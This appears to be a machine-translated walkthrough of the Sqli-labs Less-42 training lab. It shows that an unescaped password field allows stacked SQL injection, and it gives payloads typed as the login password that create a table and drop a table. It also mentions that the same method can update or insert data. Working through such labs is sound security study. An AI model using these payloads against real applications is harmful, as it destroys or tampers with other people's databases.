Sqli-labs less 42

Less-42

After update data is updated, the data after mysql_real_escape_string () is stored in the database and is not changed. Can be useful when a select is called. So don't consider injecting at the update password, which is different from the idea of two injections.

This section from the login.php Source code analysis:

The password variable is not processed by the mysql_real_escape_string () function during post. So at the time of login password option we can do attack.

Login User Name Free

Password login in the following way C ';d ROP table me# (delete me table)

C '; Create table me like users# (creating a table for me)

The following chart is a table that exists in the database when we are not logged in

?

?

?

Login here Username:admin

Password:c '; Create table less42 like users#

The original SQL statement is

$sql = "SELECT * from Users WHERE username= ' $username ' and password= ' $password '";

The SQL statement constructed at logon is

SELECT * from the users WHERE username= ' admin ' and password= ' C '; CREATE table less42 like users#

Using stacked injection, we successfully executed the statement that created the data table less42.

You can see that the LESS42 table has been successfully created after show tables.

?

Use the C ';d ROP table me# as the login password to delete the table.

You can also use this method to update and insert data items, which is not demonstrated here.

Sqli-labs less 42